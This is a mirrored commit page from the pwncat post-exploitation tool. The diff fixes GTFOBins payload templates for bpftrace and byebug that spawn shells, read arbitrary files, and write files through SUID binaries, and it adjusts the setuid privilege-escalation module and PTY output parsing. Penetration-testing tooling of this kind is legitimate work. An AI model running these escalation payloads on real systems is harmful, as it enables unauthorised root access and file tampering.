Saverr/pwncat
1
0
Fork 0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-24 09:35:39 +01:00
Code Projects Releases Wiki Activity

Merge branch 'master' of github.com:calebstewart/pwncat

Browse Source
This commit is contained in:
Caleb Stewart 2020-05-09 22:08:08 -04:00
commit 7eff74efd5
4 changed files with 14 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
.gitignore vendored
View File

@ -4,3 +4,4 @@ env/
**/*.egg-info/ **/*.egg-info/
build/ build/
dist/ dist/
.byebug_history

13
data/gtfobins.json
View File

@ -85,7 +85,7 @@
{ {
"name": "bpftrace", "name": "bpftrace",
"shell": { "shell": {
"script": "{command} -c {shell} -e 'END {{{{exit()}}}}'", "script": "{command} -c {shell} -e 'END {{exit()}}'",
"suid": ["-p"] "suid": ["-p"]
} }
}, },
@ -119,13 +119,16 @@
{ {
"name": "byebug", "name": "byebug",
"shell": { "shell": {
"script": "TF=$(mktemp);echo 'system(\"{shell}\")' > $TF;{command} $TF", "script": "TF=$(mktemp);echo 'system(\"{shell}\")' > $TF;{command} --no-stop -q $TF",
"input": "continue\n" "need": [
"--no-stop",
"-q"
]
}, },
"read_file": "TF=$(mktemp);echo 'system(\"cat {lfile}\")' > $TF;{command} $TF", "read_file": "TF=$(mktemp);echo 'system(\"cat {lfile}\")' > $TF;{command} --no-stop -q $TF",
"write_file": { "write_file": {
"type": "base64", "type": "base64",
"payload": "TF=$(mktemp);echo 'system(\"echo {data} | base64 -d > {lfile}\")' > $TF;{command} $TF" "payload": "TF=$(mktemp);echo 'system(\"echo {data} | base64 -d > {lfile}\")' > $TF;{path} --no-stop -q $TF"
} }
}, },
{ {

2
pwncat/privesc/setuid.py
View File

@ -67,6 +67,7 @@ class SetuidMethod(Method):
# Update the cache for the current user # Update the cache for the current user
self.find_suid() self.find_suid()
known_techniques = []
for user, paths in self.suid_paths.items(): for user, paths in self.suid_paths.items():
for path in paths: for path in paths:
binary = gtfobins.Binary.find(path) binary = gtfobins.Binary.find(path)
@ -95,6 +96,7 @@ class SetuidMethod(Method):
# Run the start commands # Run the start commands
self.pty.run(enter + "\n", wait=False) self.pty.run(enter + "\n", wait=False)
# self.pty.process(enter, delim=False)
# Send required input # Send required input
self.pty.client.send(input.encode("utf-8")) self.pty.client.send(input.encode("utf-8"))

3
pwncat/pty.py
View File

@ -799,6 +799,8 @@ class PtyHandler:
response = self.recvuntil(b"_PWNCAT_ENDDELIM_") response = self.recvuntil(b"_PWNCAT_ENDDELIM_")
response = response.split(b"_PWNCAT_ENDDELIM_")[0] response = response.split(b"_PWNCAT_ENDDELIM_")[0]
if b"_PWNCAT_STARTDELIM_" in response:
response = b"\n".join(response.split(b"\n")[1:])
if self.has_cr: if self.has_cr:
self.recvuntil(b"\r\n") self.recvuntil(b"\r\n")
@ -985,6 +987,7 @@ class PtyHandler:
if line == "": if line == "":
continue continue
line = line.strip().split(":") line = line.strip().split(":")
user_data = { user_data = {
"name": line[0], "name": line[0],
"password": None, "password": None,